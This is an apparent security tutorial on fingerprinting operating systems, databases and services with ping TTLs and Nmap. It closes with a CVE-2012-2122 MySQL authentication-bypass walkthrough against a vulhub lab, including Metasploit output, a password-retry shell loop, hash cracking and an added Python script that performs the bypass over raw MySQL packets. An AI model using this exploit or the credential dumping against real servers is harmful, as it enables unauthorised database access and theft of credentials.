System and database security issues
Operating-system level
Common methods for identifying the operating system
- Case sensitivity of URL paths
Windows is case-insensitive in file paths by default, so a request whose letter case has been changed still resolves:
https://www.bilibili.com/video/BV1JZ4y1c7ro?p=5
https://www.bilibili.com/video/BV1JZ4y1c7ro?P=5
both open normally.
Linux filesystems are case-sensitive:
https://ctf.bugku.com/challenges/detail/id/81.html
https://ctf.bugku.com/challenges/detail/iD/81.html does not exist.
Caveat: only a path component that maps to a file on disk is a reliable test. A query-string parameter such as ?p=5 is interpreted by the application code, not by the filesystem, so tolerance of ?P=5 says nothing about the host OS. Framework routing and rewrite rules can also mask the filesystem's behaviour, so treat the result as a hint to be confirmed by TTL or Nmap.
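The case-sensitivity check above, written out as a small tool. This is an added example, not code from the original article: it flips the case of the last path segment (never the query string, for the reason given above), compares the two status codes, and labels the result. The bugku URL is the one from the text; the probe() function needs network access and is only illustrative.

```python
# Added example (not from the original article): flip the letter case of the
# last *path* segment of a URL and compare the two responses. The query string
# (?p=5 vs ?P=5) is left alone on purpose: its case is interpreted by the
# application, so only the path says anything about the server's filesystem.
import http.client
from urllib.parse import urlsplit, urlunsplit


def case_variant_url(url: str) -> str:
    """Return url with the last path segment that contains letters swap-cased;
    host and query string are unchanged."""
    parts = urlsplit(url)
    segments = parts.path.split("/")
    for i in range(len(segments) - 1, -1, -1):
        if any(ch.isalpha() for ch in segments[i]):
            segments[i] = segments[i].swapcase()
            return urlunsplit(parts._replace(path="/".join(segments)))
    raise ValueError("URL path contains no letters to flip")


def classify(status_original: int, status_variant: int) -> str:
    """Interpret the two HTTP status codes (original path, case-flipped path)."""
    if status_original != 200:
        return "inconclusive: the original path does not return 200"
    if status_variant == 200:
        return "case-insensitive: likely Windows (or a rewrite rule masks the filesystem)"
    if status_variant == 404:
        return "case-sensitive: likely Linux/Unix"
    # redirects, 403s etc. are not evidence either way
    return "inconclusive: variant returned %d" % status_variant


def _status(url: str, timeout: float) -> int:
    """Fetch one URL with GET and return the HTTP status code."""
    p = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if p.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(p.netloc, timeout=timeout)
    target = (p.path or "/") + ("?" + p.query if p.query else "")
    conn.request("GET", target, headers={"User-Agent": "case-probe"})
    code = conn.getresponse().status
    conn.close()
    return code


def probe(url: str, timeout: float = 5.0) -> str:
    """Live check (needs network; not exercised offline): fetch both variants."""
    return classify(_status(url, timeout), _status(case_variant_url(url), timeout))


if __name__ == "__main__":
    print(probe("https://ctf.bugku.com/challenges/detail/id/81.html"))
```

Note that the variant of .../id/81.html becomes .../id/81.HTML: flipping the file name rather than a directory keeps the test closest to a real on-disk lookup.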
- Judging the target OS by TTL
Different operating systems use different default initial TTL values, so the TTL seen in a ping reply can be used to guess the target's OS. Each router on the path decrements the TTL by one, so the observed value is the initial TTL minus the hop count: an observed 52 implies an initial 64 and 12 hops, so pick the smallest default at or above the observed value. An administrator can change the default, which would mislead this check, so it is not always accurate. Default TTLs:
Windows NT/2000: 128
UNIX: 255
Linux: 64
Windows 7: 128
Run ping from a command window (1.12.250.218 is my CentOS system):
From the returned TTL we can roughly determine that it is a Linux system.
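The TTL heuristic as code, added here as an example (not from the original article): it extracts the TTL from ping output, maps it to the nearest default from the table above, and reports the implied hop count. The two ping outputs are constructed samples, not captures from the article's host.

```python
# Added example (not from the original article): pull the TTL out of a ping
# reply and map it back to the nearest default initial TTL from the table above.
import re
from typing import Dict, Optional

# Default initial TTLs from the table above. Other systems share these values
# (FreeBSD and macOS also start at 64, many routers at 255), so the result is
# an OS family, not a specific product.
DEFAULT_TTLS = {
    64: "Linux (or other Unix-like)",
    128: "Windows",
    255: "UNIX (Solaris/AIX) or network device",
}

# Matches both "ttl=52" (Linux ping) and "TTL=52" (Windows ping, any locale).
TTL_RE = re.compile(r"\bttl=(\d{1,3})\b", re.IGNORECASE)

# Constructed sample outputs, not captured from the article's host.
SAMPLE_LINUX_PING = """PING 1.12.250.218 (1.12.250.218) 56(84) bytes of data.
64 bytes from 1.12.250.218: icmp_seq=1 ttl=52 time=26.1 ms
64 bytes from 1.12.250.218: icmp_seq=2 ttl=52 time=25.9 ms"""

SAMPLE_WINDOWS_PING = """Reply from 192.0.2.10: bytes=32 time=31ms TTL=116
Reply from 192.0.2.10: bytes=32 time=30ms TTL=116"""


def extract_ttl(ping_output: str) -> Optional[int]:
    """Return the TTL from the first reply line, or None if none is present."""
    m = TTL_RE.search(ping_output)
    return int(m.group(1)) if m else None


def guess_os(ttl: int) -> Dict[str, object]:
    """Map an observed TTL to the smallest default initial TTL that is >= ttl.
    Each router on the path decrements the TTL by one, so initial - observed
    is the hop count. An implausible hop count (> 30) marks the guess as
    low-confidence, which is what a changed default looks like."""
    if not 1 <= ttl <= 255:
        raise ValueError("TTL must be between 1 and 255")
    initial = min(t for t in DEFAULT_TTLS if t >= ttl)
    hops = initial - ttl
    return {
        "observed": ttl,
        "initial": initial,
        "hops": hops,
        "os": DEFAULT_TTLS[initial],
        "confidence": "low" if hops > 30 else "medium",
    }


def fingerprint(ping_output: str) -> Optional[Dict[str, object]]:
    """Convenience wrapper: ping output -> OS guess, or None without a TTL."""
    ttl = extract_ttl(ping_output)
    return guess_os(ttl) if ttl is not None else None


if __name__ == "__main__":
    for name, out in (("linux", SAMPLE_LINUX_PING), ("windows", SAMPLE_WINDOWS_PING)):
        print(name, fingerprint(out))
```

The confidence field is the practical caveat from the text: a reply with TTL 20 maps to "Linux, 44 hops", which almost certainly means someone changed the default rather than a 44-hop path.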
- Using Nmap
C:\Users\15283>nmap -O 1.12.250.218
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 18:37 China Standard Time
Nmap scan report for 1.12.250.218
Host is up (0.026s latency).
Not shown: 991 filtered tcp ports (no-response), 3 filtered tcp ports (admin-prohibited)
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   open   ssh
80/tcp   open   http
888/tcp  open   accessbuilder
8888/tcp open   sun-answerbook
Aggressive OS guesses: Linux 5.1 (92%), Linux 3.10 - 4.11 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 3.18 (89%), Linux 3.16 - 4.6 (89%), Linux 4.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.22 seconds
The guesses are all Linux kernels, so the host is Linux. Nmap's -O fingerprinting is most reliable when it finds at least one open and one closed TCP port, which it did here (22/80 open, 20/21 closed); a fully filtered host gives much vaguer guesses.
Meaning of OS-level vulnerability types
Windows security vulnerabilities:
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/securitybulletins2017
For example, MS17-010 (EternalBlue) is a Windows remote code execution vulnerability in the SMBv1 service; exploiting it gives the attacker code execution on the remote machine, typically as SYSTEM.
Brief scope of impact of OS-level vulnerabilities
A vulnerability that yields operating-system privileges (a shell or code execution on the host itself) is a high-risk vulnerability.
Database level
Common methods for identifying the database type
- Common stack combinations:
ASP + Access
PHP + MySQL
ASPX + MS SQL Server
JSP + MySQL or Oracle
Python + MongoDB
- Use Nmap to scan and check which ports are open
Relational databases: MySQL 3306, SQL Server 1433, Oracle 1521, PostgreSQL 5432
Non-relational databases: MongoDB 27017, Redis 6379, Memcached 11211
Caveat: these are default ports. A database on a non-standard port is identified by its banner (nmap -sV), not by the port number alone, and a service on 3306 is not necessarily MySQL.
Common database vulnerability types and attacks
Weak passwords
Vulnerabilities in the database software itself
- Brief scope of impact of database-level vulnerabilities
Database privileges
Website privileges
Modifying web page content
Third-party level
How to determine which third-party platforms or software are present
Scanning the website: some sites have third-party software such as phpMyAdmin installed, and a directory scan reveals its installation path.
Determining installed third-party software by port scanning:
nmap -O -sV 10.1.1.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:26 CST
Nmap scan report for 10.1.1.130 (10.1.1.130)
Host is up (0.00085s latency).
Not shown: 978 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
From the VERSION column we can read off the third-party components directly: vsftpd 2.3.4, ProFTPD 1.3.1, OpenSSH 4.7p1, Apache httpd 2.2.8, Tomcat on 8180, UnrealIRCd, Samba, MySQL 5.0.51a, PostgreSQL 8.3, VNC and Java RMI, each of which can then be checked for known vulnerabilities.
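Reading the scan output by hand works for one host; the example below does the same mechanically. It is an added example, not from the original article: it parses Nmap's PORT/STATE/SERVICE/VERSION lines, picks out database services (by banner first, falling back to the default ports listed in the database section above) and lists every other open port that Nmap attached a version string to, which is the third-party inventory discussed here. The sample input is a subset of the Metasploitable scan lines shown above.

```python
# Added example (not from the original article): parse Nmap's PORT/STATE/
# SERVICE/VERSION lines and pull out database services and versioned
# third-party components. SAMPLE_SCAN is a subset of the scan output above.
import re
from typing import Dict, List

PORT_RE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)

# Default ports from the table in the database section.
DB_PORTS = {3306: "MySQL", 1433: "SQL Server", 1521: "Oracle", 5432: "PostgreSQL",
            27017: "MongoDB", 6379: "Redis", 11211: "Memcached"}
# Nmap service names (from -sV banners); checked before the port so that a
# database listening on a non-default port is still recognised.
DB_SERVICES = {"mysql": "MySQL", "ms-sql-s": "SQL Server", "oracle-tns": "Oracle",
               "postgresql": "PostgreSQL", "mongodb": "MongoDB", "redis": "Redis",
               "memcache": "Memcached"}

SAMPLE_SCAN = """PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
512/tcp open exec?
1524/tcp open bindshell Metasploitable root shell
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
6667/tcp open irc UnrealIRCd
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1"""


def parse_nmap(text: str) -> List[Dict[str, object]]:
    """Turn Nmap normal-output port lines into dicts; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m:
            continue  # header, "Not shown:", OS detection lines, etc.
        row = m.groupdict()
        row["port"] = int(row["port"])
        rows.append(row)
    return rows


def classify(rows: List[Dict[str, object]]) -> Dict[str, list]:
    """Split open ports into databases (by banner, then by default port) and
    other components that Nmap attached a version string to."""
    databases, third_party = [], []
    for r in rows:
        if r["state"] != "open":
            continue
        name, how = DB_SERVICES.get(r["service"]), "banner"
        if name is None and r["port"] in DB_PORTS:
            name, how = DB_PORTS[r["port"]], "default port only"
        if name:
            databases.append({"port": r["port"], "name": name,
                              "version": r["version"], "matched_by": how})
        elif r["version"]:
            third_party.append({"port": r["port"], "service": r["service"],
                                "version": r["version"]})
    return {"databases": databases, "third_party": third_party}


if __name__ == "__main__":
    result = classify(parse_nmap(SAMPLE_SCAN))
    for db in result["databases"]:
        print("database:", db)
    for comp in result["third_party"]:
        print("third-party:", comp)
```

The "matched_by" field records whether the database was recognised from its banner or only from the port number, so a "default port only" match is a reminder to confirm it with -sV before spending time on database-specific attacks.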
Why identify third-party platforms or software
Different third-party software or tools carry different vulnerabilities; the more components identified, the more candidate vulnerabilities can be collected for the target.
Common vulnerability types and attacks against third-party platforms or software
Weak passwords
Exploitation of vulnerabilities in the software itself
Brief scope of security testing for third-party platforms or software
Gaining the software's own privileges directly, which then serves as a foothold for further privilege escalation and attacks
Supplement
Besides conventional web and app security testing, other services on a server, whether a single service or a combination (mail, game servers, load balancers, etc.), can also be security-testing targets. The testing principles for such targets are the same; what is missing is only the web-application layer and its specific issues. So having a clear testing methodology is important!
Example
Set up vulhub on the target machine
crabin@crabin-virtual-machine:~/vulhub/mysql/CVE-2012-2122$ docker-compose up -d
Creating network "cve-2012-2122_default" with the default driver
Pulling mysql (vulhub/mysql:5.5.23)...
5.5.23: Pulling from vulhub/mysql
22dc81ace0ea: Pull complete
1a8b3c87dba3: Pull complete
91390a1c435a: Pull complete
07844b14977e: Pull complete
b78396653dae: Pull complete
fe8cde33ebc9: Pull complete
eb305569f43b: Pull complete
Digest: sha256:5bbb7570f16526da1de61e84487daade5614eb2a9bfd28a87bcf4d6795b94463
Status: Downloaded newer image for vulhub/mysql:5.5.23
Creating cve-2012-2122_mysql_1 ... done
Demonstration of a database weak password and vulnerability (CVE-2012-2122)
Reference: https://vulhub.org/#/environments/mysql/CVE-2012-2122/
Background: in the affected MySQL/MariaDB versions the password check stores the return value of memcmp() in a char-sized variable. On platforms where memcmp can return values outside -128..127 (for example glibc's optimized memcmp on x86_64), a wrong password is accepted whenever the truncated result happens to be zero, roughly once in 256 attempts. An attacker who knows a valid username can therefore log in simply by retrying.
┌──(root💀kali)-[~]
└─# nmap -O -sV 10.1.1.133
Starting Nmap 7.91 ( https://nmap ) at 2021-06-08 11:09 CST
Nmap scan report for 10.1.1.133 (10.1.1.133)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
3306/tcp open mysql MySQL 5.5.23
MAC Address: 00:0C:29:13:E9:61 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
Exploitation
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 10.1.1.133
rhosts => 10.1.1.133
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set threads 10
threads => 10   # number of threads
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 10.1.1.133:3306 - 10.1.1.133:3306 The server allows logins, proceeding with bypass test
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 10% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 20% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 30% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 40% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 50% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 60% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 70% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 80% complete
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Successfully bypassed authentication after 847 attempts. URI: mysql://root:DBrmCST@10.1.1.133:3306
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Hash Table has been saved: /root/.msf4/loot/20210608111341_default_10.1.1.133_mysql.hashes_091970.txt
[*] 10.1.1.133:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Cracking the hash
The dumped value *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 is not an MD5 digest: the leading * marks the MySQL 4.1+ mysql_native_password format, SHA1(SHA1(password)) in uppercase hex. Online lookup sites such as https://www.cmd5.com/ index this format as well; it resolves to 123456, which then logs in normally:
└─# mysql -uroot -p123456 -h10.1.1.133
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 886
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
+--------------------+
4 rows in set (0.001 sec)
Method two: trigger the bypass directly with the mysql client. Each connection with a wrong password has roughly a 1 in 256 chance of being accepted on an affected build, so a few hundred attempts are normally enough; the loop stops at the interactive prompt once a login succeeds.
┌──(root💀kali)-[~]
└─# for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.1.1.133 -P 3306; done
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 1553
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Successfully logged in to the MySQL database on the target host.
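Two things in this example are worth seeing at a lower level: what the dumped "*6BB4..." value actually is (the hash-cracking step above), and what the retry loop in Method two does on the wire. The block below is an added example, not code from the original article or from vulhub: it computes the mysql_native_password hash so the loot line can be matched offline against candidate passwords, and it reimplements the CVE-2012-2122 retry as a raw MySQL handshake (read HandshakeV10, compute the SHA1 scramble, send HandshakeResponse41, check for an OK or ERR packet). The target 10.1.1.133:3306 and user root are taken from the lab above; that the build is affected is assumed.

```python
# Added example, not code from the original article or from vulhub. It shows
# what the dumped "*6BB4..." value is (a mysql_native_password hash, not MD5)
# and reimplements the retry loop from "Method two" at the packet level, so the
# CVE-2012-2122 bypass can be seen as a plain MySQL handshake exchange.
# Assumed: target 10.1.1.133:3306 from the lab above, user root, an affected build.
import hashlib
import socket
import struct
from typing import Iterable, Optional


def mysql_native_hash(password: str) -> str:
    """MySQL 4.1+ hash as stored in mysql.user: '*' + hex(SHA1(SHA1(pw)))."""
    stage1 = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(stage1).hexdigest().upper()


def match_hash(mysql_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline equivalent of the cmd5 lookup: test candidates against the hash."""
    for pw in candidates:
        if mysql_native_hash(pw) == mysql_hash.upper():
            return pw
    return None


def scramble_native(password: str, salt: bytes) -> bytes:
    """Client auth token: SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw))), 20 bytes."""
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mixed = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mixed))


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def read_packet(sock: socket.socket) -> bytes:
    """One MySQL packet: 3-byte little-endian length, 1-byte sequence id, body."""
    hdr = _recv_exact(sock, 4)
    return _recv_exact(sock, hdr[0] | hdr[1] << 8 | hdr[2] << 16)


def parse_handshake(pkt: bytes) -> bytes:
    """Return the 20-byte salt from a HandshakeV10 body (protocol version 10)."""
    if pkt[0] != 10:
        raise ValueError("unsupported protocol version %d" % pkt[0])
    pos = pkt.index(b"\x00", 1) + 1   # server_version (NUL-terminated string)
    pos += 4                          # connection_id
    salt = pkt[pos:pos + 8]           # auth-plugin-data part 1
    # 8 salt + 1 filler + 2 caps(lo) + 1 charset + 2 status + 2 caps(hi)
    # + 1 auth-data length + 10 reserved
    pos += 8 + 1 + 2 + 1 + 2 + 2 + 1 + 10
    return salt + pkt[pos:pos + 12]   # part 2: 12 bytes (the 13th is a NUL)


def build_login(user: str, token: bytes) -> bytes:
    """HandshakeResponse41 with sequence id 1 (the packet after the handshake)."""
    # CLIENT_LONG_PASSWORD | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
    caps = 0x00000001 | 0x00000200 | 0x00008000 | 0x00080000
    body = struct.pack("<IIB", caps, 16 * 1024 * 1024, 33) + b"\x00" * 23  # max packet, utf8, reserved
    body += user.encode() + b"\x00" + bytes([len(token)]) + token
    body += b"mysql_native_password\x00"
    return struct.pack("<I", len(body))[:3] + b"\x01" + body


def try_login(host: str, port: int, user: str, password: str, timeout: float = 3.0) -> bool:
    """One authentication attempt; True on an OK packet (0x00), False on ERR (0xFF)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        salt = parse_handshake(read_packet(s))
        s.sendall(build_login(user, scramble_native(password, salt)))
        reply = read_packet(s)
    return reply[0] == 0x00


def bypass(host: str, port: int = 3306, user: str = "root", attempts: int = 1000) -> Optional[int]:
    """CVE-2012-2122: keep sending the same wrong password; on an affected build
    the truncated memcmp() result is zero about once in 256 tries. Returns the
    successful attempt number, or None if the server looks patched."""
    for i in range(1, attempts + 1):
        if try_login(host, port, user, "wrong"):
            return i
    return None


if __name__ == "__main__":
    print(match_hash("*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9", ["password", "123456"]))
    print(bypass("10.1.1.133"))  # lab target from the article
```

A None result from bypass() after 1000 attempts is the expected outcome on a patched server or on a build whose memcmp never returns an out-of-range value, which is why the Metasploit module first reports whether "the server allows logins" before starting the bypass test.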
Original title: 【网络安全】系统及数据库等安全问题 (Network security: system and database security issues), a user-contributed article. Source: http://www.freenas.com.cn/jishu/1733863350h1635037.html